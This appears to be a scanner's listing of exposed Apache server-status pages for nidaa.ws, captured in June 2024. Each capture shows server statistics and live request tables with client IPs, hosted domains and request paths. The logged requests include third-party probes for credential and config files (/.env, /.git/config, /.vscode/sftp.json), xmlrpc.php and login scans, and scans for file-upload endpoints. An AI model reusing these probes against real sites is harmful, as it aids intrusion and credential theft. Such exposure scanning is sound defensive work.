      175.110.221.112http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      1-2230910/8/431_
      1.653991928060.00.6223.87
      216.244.66.245http/1.1garndhabi.org:80GET /robots.txt HTTP/1.1
      
      1-2230910/9/509_
      1.653333708760.00.3685.42
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1718157099.27002906799316406250
      
      1-2230910/8/343_
      1.6830721810840.00.1334.67
      175.110.221.112http/1.1
      Found on 2024-06-12 01:57
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7a1f1181e

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 10-Jun-2024 18:12:48 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 11
      Parent Server MPM Generation: 10
      Server uptime:  18 days 14 hours 7 minutes 58 seconds
      Server load: 0.21 0.38 0.40
      Total accesses: 2994013 - Total Traffic: 403.8 GB - Total Duration: 3093692994
      CPU Usage: u807.16 s39.19 cu12209.4 cs2726.63 - .983% CPU load
      1.86 requests/sec - 263.6 kB/second - 141.4 kB/request - 1033.29 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 215 idle workers
      ________K______K_________________________________K______________
      ____________________W______________________K_________________WWW
      WWWWWWWWWWWWWWWWWWWWWW________K_________________K_______________
      ________..................................................______
      _______________K___.........................________R__________K
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1077620/52/13895_
      4.242980113657750.01.991850.36
      23.137.104.111http/1.13dvi.com:80GET /wp-includes/inputs.php HTTP/1.1
      
      0-1077620/26/12012_
      4.23362275458460.01.041771.76
      5.82.39.204http/1.1albayan.edu.sa:443GET /web/images/folder.gif HTTP/1.1
      
      0-1077620/32/12243_
      4.47614767406380.01.001688.28
      142.154.36.111http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%AB%D8%A7%D9%84%D8%AB%20%D8%A7%D9%88%D8%A7%
      
      0-1077620/57/12968_
      4.33781403086300.03.301763.41
      95.187.113.73http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-1077620/31/12773_
      4.3548088783630.02.881642.31
      5.163.62.48http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-1077620/31/12676_
      4.2527120169106470.01.552025.11
      172.70.158.158http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-1077620/32/12799_
      4.131591160015460.01.041880.12
      5.82.39.204http/1.1
      
      0-1077620/31/12177_
      4.0823530227141580.02.951892.42
      5.110.104.98http/1.1
      
      0-1077621/31/13416K
      4.500191033290.93.051934.45
      162.158.95.96http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-1077620/33/13151_
      4.1470781125910.01.051716.53
      5.82.39.204http/1.1
      
      0-1077620/15/12767_
      4.356710293637130.01.841445.58
      216.244.66.242http/1.1jawad.com.sa:443GET /robots.txt HTTP/1.1
      
      0-1077620/44/13377_
      4.39423678157470.03.541408.67
      172.69.150.168http/1.1qr.brunch.ws:443GET /assets/images/auth-bg.jpg HTTP/1.1
      
      0-1077620/48/12882_
      4.26247294973900.02.102023.00
      5.110.104.98http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/__________%20______
      
      0-1077620/28/12695_
      4.38421080752630.01.181861.25
      172.69.150.59http/1.1qr.brunch.ws:443GET /storage/logo/17090324875982_artboard8.svg HTTP/1.1
      
      0-1077620/36/12216_
      4.4135389129492460.01.241334.35
      5.82.39.204http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D8%AC%D8%AA%D9%85%
      
      0-1077621/30/12815K
      4.50262453487083458.94.391504.96
      66.249.64.12http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A7%D9%84%D8%AF%D9%84%D9%8A%D9%84%20%D8%A7%
      
      0-1077620/42/12676_
      4.321253339457880.06.401808.38
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1718032243.16612505912780761718
      
      0-1077620/17/12963_
      4.262190119957240.00.832042.52
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-1077620/21/12708_
      4.243275371480540.00.671764.27
      23.137.104.111http/1.13dvi.com:443GET /wp-admin/inputs.php HTTP/1.1
      
      0-1077620/22/13441_
      4.19421093141890.01.081666.60
      5.82.39.204http/1.1albayan.edu.sa:80GET /registration/employee_form.php HTTP/1.1
      
      0-1077620/44/12349_
      4.311922232286250.01.981700.47
      142.154.76.139http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2022/02/cropped-Artboard-2-1-192x192.pn
      
      0-1077620/19/13000_
      4.06340384342060.00.751592.81
      45.94.7.240http/1.1
      
      0-1077620/80/12507_
      4.4037574178510.00.641756.53
      172.69.150.75http/1.1qr.brunch.ws:443GET /assets/libs/choices.js/public/assets/styles/choices.min.cs
      
      0-1077620/32/12661_
      4.47143201493540.02.592111.23
      142.154.36.111http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-1077620/32/13061_
      4.22390391547940.04.341967.10
      5.82.39.204http/1.1albayan.edu.sa:443GET /e_sch/images/001_43.png HTTP/1.1
      
      1-1082380/30/12283_
      3.922462117425380.01.982015.34
      5.110.104.98http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-1082380/31/12677_
      3.883365896025220.01.311988.42
      23.137.104.111http/1.13dvi.com:443GET /inputs.php HTTP/1.1
      
      1-1082380/34/13072_
      4.1142591469650.01.371849.41
      172.68.195.201http/1.1qr.brunch.ws:443GET /assets/libs/pristinejs/pristine.min.js HTTP/1.1
      
      1-1082380/23/12497_
      4.07482129390710.020.061450.51
      5.163.62.48http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/________1_2.jpg HTT
      
      1-1082380/15/12022_
      3.87368485793520.02.301632.65
      66.249.64.14http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=548 HTTP/1.1
      
      1-1082380/23/12850_
      4.1237681113050.01.161617.62
      172.69.150.88http/1.1qr.brunch.ws:443GET /assets/cdns/intlTelInput.css HTTP/1.1
      
      1-1082380/35/11989_
      4.161016108080420.03.201782.94
      172.69.150.96http/1.1qr.brunch.ws:443GET /assets/js/utils.js HTTP/1.1
      
      1-1082380/31/12653_
      3.8643118075748
      Found on 2024-06-10 15:12
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7b5b78e03

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 10-Jun-2024 13:10:15 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 11
      Parent Server MPM Generation: 10
      Server uptime:  18 days 9 hours 5 minutes 26 seconds
      Server load: 0.47 0.47 0.52
      Total accesses: 2794643 - Total Traffic: 397.9 GB - Total Duration: 3071830442
      CPU Usage: u1688.73 s191.55 cu10795.9 cs2489.18 - .955% CPU load
      1.76 requests/sec - 262.7 kB/second - 149.3 kB/request - 1099.19 ms/request
      22 requests currently being processed, 0 workers gracefully restarting, 228 idle workers
      _________W_________________________K________K__________K________
      _______________________________K___K___K_________K___________WWW
      WWWWWWWWWWWWWWWWWWWWWW________K__________RK________K____________
      K_____________W____K_________K______________K_____K_____K_____K_
      ___K__________K____.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-10150090/1641/13024_
      105.711662112943410.056.921823.62
      193.35.18.105http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=474.css HTTP/1.1
      
      0-10150090/1149/11220_
      105.87109275151160.034.831754.95
      185.220.101.20http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=645.js HTTP/1.1
      
      0-10150090/1232/11579_
      106.6311366855570.095.361671.50
      138.201.201.48http/1.1trynidaa.com:443POST /wp-cron.php?doing_wp_cron=1718014204.04943299293518066406
      
      0-10150090/1549/12069_
      105.182792402935370.034.341740.34
      188.53.73.188http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=2581.svg HTTP/1.
      
      0-10150090/1258/11972_
      106.1078488641740.034.881629.30
      5.109.112.177http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-10150090/1500/11700_
      105.452200168645940.034.282003.50
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=1&q=269&t=195.154.146.17&c=5 HTT
      
      0-10150090/1429/11920_
      106.48240159642110.049.261828.21
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=417&t=144.76.3.131&c=5 HTTP/
      
      0-10150090/1255/11469_
      105.691662226998000.029.951878.16
      151.255.14.203http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%AA%D9%86%D8%B2%D9%8A%D9%84.png HTTP/1.1
      
      0-10150090/1391/12646_
      105.36243090775850.060.271917.97
      192.42.116.208http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=1780.php HTTP/1.
      
      0-10150090/1329/12195W
      105.020280948110.035.351689.21
      188.53.73.188http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=1644.png HTTP/1.
      
      0-10150090/1475/11907_
      105.681752293427670.032.421423.34
      5.109.11.151http/1.1albayan.edu.sa:443GET /e_sch/css/images/pause.png HTTP/1.1
      
      0-10150090/1559/12504_
      105.681762968791410.038.631381.94
      51.252.223.71http/1.1jawad.com.sa:443POST /api/v.1/front/related/product HTTP/1.1
      
      0-10150090/1288/12109_
      106.0775294717980.064.952001.69
      40.77.167.10http/1.1albayan.edu.sa:443GET /imgweb/1445/747.pdf HTTP/1.1
      
      0-10150090/1568/11834_
      105.582013680506940.040.071838.11
      51.252.223.71http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      0-10150090/1208/11556_
      103.241261129347050.035.951317.57
      176.29.173.45http/1.1
      
      0-10150090/1663/12058_
      106.4844552755270.035.061476.58
      145.82.193.130http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-10150090/1454/11948_
      106.12782339194880.045.821757.56
      188.53.73.188http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=852.png HTTP/1.1
      
      0-10150090/1336/12001_
      106.47502110685870.032.992013.94
      188.53.73.188http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=1996.kenburns HT
      
      0-10150090/1381/12094_
      106.649271231800.044.561750.69
      188.53.73.188http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=1363 HTTP/1.1
      
      0-10150090/1552/12582_
      106.4551293016340.074.821653.93
      188.53.73.188http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=2423.eot HTTP/1.
      
      0-10150090/1586/11726_
      105.2226561232041140.038.521684.18
      40.77.167.10http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1125&l_n=1&page=1 HTTP
      
      0-10150090/1647/12175_
      105.87109284248090.036.821574.73
      192.42.116.213http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=645.php HTTP/1.1
      
      0-10150090/1155/11663_
      105.7216622974070050.028.721739.66
      5.109.11.151http/1.1albayan.edu.sa:443GET /imgweb/vat.jpg HTTP/1.1
      
      0-10150090/1152/11757_
      105.552072201203410.0100.452094.08
      193.35.18.105http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=326.png HTTP/1.1
      
      0-10150090/1603/12253_
      106.4750189233840.039.801944.43
      207.246.117.117http/1.1hawsab.me:80HEAD /home HTTP/1.1
      
      1-10315820/1276/11400_
      97.62710110575580.039.291997.25
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=392&t=173.249.2.13&c=5 HTTP/
      
      1-10315820/1453/12137_
      97.01245594814410.0130.971911.77
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=1&q=157&t=95.216.45.152&c=5 HTTP
      
      1-10315820/1340/12218_
      97.6079291294360.052.791835.00
      188.53.73.188http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.ttf?v=179.jpg HTTP/1.1
      
      1-10315820/996/11702_
      97.80352128410420.024.651415.78
      145.82.193.130http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-10315820/1294/11479_
      97.15166285612950.032.541618.42
      151.255.14.203http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-10315820/1329/12010
      Found on 2024-06-10 10:10
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7e392714e

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 08-Jun-2024 20:49:27 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  16 days 16 hours 44 minutes 37 seconds
      Server load: 0.27 0.37 0.40
      Total accesses: 2248412 - Total Traffic: 355.6 GB - Total Duration: 2825825457
      CPU Usage: u948.1 s92.3 cu9634.31 cs2184.96 - .891% CPU load
      1.56 requests/sec - 258.4 kB/second - 165.8 kB/request - 1256.81 ms/request
      13 requests currently being processed, 0 workers gracefully restarting, 237 idle workers
      _____K___________________________________________________K______
      ____W________K_____________________W_________________________WWW
      WWWWWWWWWWWWWWWWWWWWWWK_____________________R____K______________
      ___________K______________________C__________W____________KR____
      ___________________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9226310/52/10480_
      6.2113046107606420.02.021603.42
      162.240.33.211http/1.1trynidaa.com:443GET /wp-login.php HTTP/1.1
      
      0-9226310/43/9262_
      6.172652269865300.010.221647.72
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-9226310/40/9568_
      5.98211259747380.07.991489.17
      176.31.120.153http/1.1
      
      0-9226310/39/9590_
      6.2017869396701860.02.201561.51
      184.168.108.80http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-9226310/42/10006_
      6.09438283187520.03.441551.59
      2.90.124.66http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-9226311/50/9319K
      6.2400161606780.737.931824.61
      172.70.47.173http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-9226310/32/9696_
      6.234010916156784170.03.671704.87
      188.209.238.85http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-9226310/48/9516_
      6.025832223779260.03.831716.68
      95.185.79.45http/1.1albayan.edu.sa:443GET /e_sch/css/adobe.com/default.advanced.css HTTP/1.1
      
      0-9226310/46/10297_
      6.18246179296960.02.041719.21
      172.70.222.18http/1.1eg.daaris.com:443GET /ico/favicon-32x32.png HTTP/1.1
      
      0-9226310/32/10008_
      6.2018811176693150.01.361567.05
      172.70.158.133http/1.1sibaqulhorof.com:443POST /api/v1/app/game/use/help HTTP/1.1
      
      0-9226310/54/9492_
      6.2116767291015920.024.111284.18
      45.142.159.29http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-9226310/55/10197_
      6.07489164786240.04.351256.35
      94.156.65.66http/1.1white-petals.com:80GET /app/.git/config HTTP/1.1
      
      0-9226310/32/9765_
      5.31532389639030.02.851849.04
      176.123.21.185http/1.1
      
      0-9226310/37/9496_
      6.2210411573162840.019.441670.77
      172.70.158.133http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-9226310/38/9357_
      6.094200123831060.02.241219.66
      207.102.138.19http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-9226310/29/9549_
      6.07520344150216070.011.511377.11
      37.242.45.48http/1.1albayan.edu.sa:443GET /imgweb/file44/WBs%20on%20Site%2022-23/7th/7th%20BS-T%201-2
      
      0-9226310/33/9720_
      6.0254381335660120.01.361633.22
      17.241.227.208http/1.1albayan.edu.sa:443GET /web/132.html2 HTTP/1.1
      
      0-9226310/51/9930_
      6.1330884106388220.05.861786.18
      172.70.158.132http/1.1sibaqulhorof.com:443GET /api/v1/app/general/game_version HTTP/1.1
      
      0-9226310/77/9793_
      6.1429720768327550.08.481658.35
      66.249.64.14http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D9%84%D8%B5%
      
      0-9226310/33/10160_
      6.2422672074772520.029.101436.96
      66.118.174.167http/1.1albayan.edu.sa:443GET /images/slider/03.jpg HTTP/1.1
      
      0-9226310/22/9390_
      6.133572224680820.03.661424.49
      31.167.25.200http/1.13dvi.com:443GET /v/sibaqulhorof/ HTTP/1.1
      
      0-9226310/50/9837_
      6.07509176504630.04.291408.63
      94.156.65.66http/1.1white-petals.com:80GET /static../.git/config HTTP/1.1
      
      0-9226310/35/9624_
      6.1922515470335620.02.181583.24
      172.70.158.132http/1.1sibaqulhorof.com:443POST /api/v1/app/game/use/help HTTP/1.1
      
      0-9226310/52/9833_
      6.1241658196027800.02.481750.32
      198.244.133.153http/1.1albayan.edu.sa:443GET /images/slider/02.jpg HTTP/1.1
      
      0-9226310/32/9887_
      6.08477584066230.05.151762.30
      94.156.65.66http/1.13dvi.com:443GET / HTTP/1.0
      
      1-9232340/562/9162_
      70.01413395653000.088.801804.08
      198.244.133.153http/1.1albayan.edu.sa:443GET /e_sch/images/complaints_and_suggestions.png HTTP/1.1
      
      1-9232340/564/9791_
      70.0813628085136430.0107.991679.50
      52.167.144.145http/1.1albayan.edu.sa:443GET /imgweb/tajhezaros.pdf HTTP/1.1
      
      1-9232340/532/9964_
      69.99435215180264060.050.211675.77
      5.163.50.200http/1.1albayan.edu.sa:443GET /imgweb/file44/1390fe3a-GE-ME-K08-SM2-MATH.pdf HTTP/1.1
      
      1-9232340/523/9721_
      70.09591906125656970.092.351246.25
      188.209.238.85http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      1-9232340/476/9340_
      70.05227181375070.097.181516.39
      66.249.70.165http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/fia6%20____________%20______.
      
      1-9232340/535/9898_
      70.0330811273046390.094.291354.89
      172.70.158.143http/1.1sibaqulhorof.com:443GET /api/v1/app/general/TopPlayers?type=1 HTTP/1.1
      
      1-9232340/455/9453_
      69.975155104334870.0167.321680.88
      94.156.65.66http/1.13dvi.com:443GET / HTTP/1.0
      
      1-9232340/569/9588_
      70.04264877549300.099.
      Found on 2024-06-08 17:49
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7c86fe8e2

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 08-Jun-2024 04:09:50 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  16 days 5 minutes
      Server load: 0.49 0.49 0.46
      Total accesses: 2181573 - Total Traffic: 338.1 GB - Total Duration: 2737746816
      CPU Usage: u853.86 s72.33 cu9377.81 cs2121.17 - .899% CPU load
      1.58 requests/sec - 256.4 kB/second - 162.5 kB/request - 1254.94 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      __________K_________________W_______________K_____K_____________
      _______________________________________W____________________KWWW
      WWWWWWWWWWWWWWWWWWWWWW___________________________C______________
      _____________W___________________.........................______
      ____________K______________________________K....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9232050/153/10221_
      26.16510105203310.031.431482.52
      167.172.68.56http/1.13dvi.com:80GET /assets/jquery-file-upload/server/php/ HTTP/1.1
      
      0-9232050/230/8991_
      25.89373068465690.037.031600.19
      167.172.68.56http/1.1sradmin.3dvi.com:80GET /admin/server/php/ HTTP/1.1
      
      0-9232050/275/9357_
      25.94114057080280.029.251351.16
      167.172.68.56http/1.13dvi.com:80GET /admin/server/php/ HTTP/1.1
      
      0-9232050/145/9345_
      26.19231391964190.026.201437.29
      68.183.9.16http/1.1hawsab.me:443GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-9232050/212/9751_
      25.893698281688490.011.711479.89
      92.205.1.246http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-9232050/188/9016_
      26.182236791085160.05.791729.78
      37.56.21.169http/1.1albayan.edu.sa:443GET /e_sch/images/Background.jpg HTTP/1.1
      
      0-9232050/234/9405_
      25.941371120820870.061.621611.96
      138.68.86.32http/1.1randalift.com.sa:80GET /.env HTTP/1.1
      
      0-9232050/243/9256_
      26.16502222312700.034.911679.77
      77.31.215.43http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2022/02/cropped-Artboard-2-1-32x32.png 
      
      0-9232050/171/10054_
      25.91290178895780.033.721690.69
      64.124.8.79http/1.13dvi.com:443GET /robots.txt HTTP/1.1
      
      0-9232050/399/9815_
      26.16412171665600.021.411492.56
      45.148.10.59http/1.13dvi.com:443GET //mail.3dvi.net/js/floating-wpp.js HTTP/1.1
      
      0-9232051/129/9236K
      26.20022892418166.64.911231.85
      172.70.85.155http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-9232050/208/9935_
      25.7833613464331910.019.921242.20
      134.209.254.149http/1.1
      
      0-9232050/137/9419_
      25.94137083531250.024.531745.79
      138.68.86.32http/1.1randalift.com.sa:80GET /server HTTP/1.1
      
      0-9232050/160/9297_
      25.93197072183470.029.231638.78
      167.172.68.56http/1.13dvi.com:80GET /assets/plugins/jquery-file-upload/server/php/ HTTP/1.1
      
      0-9232050/126/9123_
      25.932163121614310.010.071202.98
      216.244.66.198http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1365 HTTP/1.1
      
      0-9232050/184/9339_
      25.91269147469570.038.931314.98
      167.172.68.56http/1.1alnwisher.com:80GET /media/filemanager/dialog.php HTTP/1.1
      
      0-9232050/194/9525_
      25.903321334471170.09.281589.70
      199.45.154.56http/1.1united.thenewjeddah.com:443GET /images/favicon.ico HTTP/1.1
      
      0-9232050/128/9731_
      25.9415648105304320.09.391764.84
      167.172.68.56http/1.13dvi.com:443GET /media/filemanager/dialog.php HTTP/1.1
      
      0-9232050/226/9549_
      25.91237065495310.089.041610.25
      167.172.68.56http/1.13dvi.com:80GET /server/php/ HTTP/1.1
      
      0-9232050/190/9847_
      26.1924171989000.026.711396.94
      68.183.9.16http/1.1hawsab.me:443GET /about HTTP/1.1
      
      0-9232050/154/9192_
      25.931850222803010.066.121351.71
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-9232050/214/9595_
      25.762761073996510.011.741384.30
      68.183.9.16http/1.1
      
      0-9232050/232/9384_
      25.89349067279110.014.791491.16
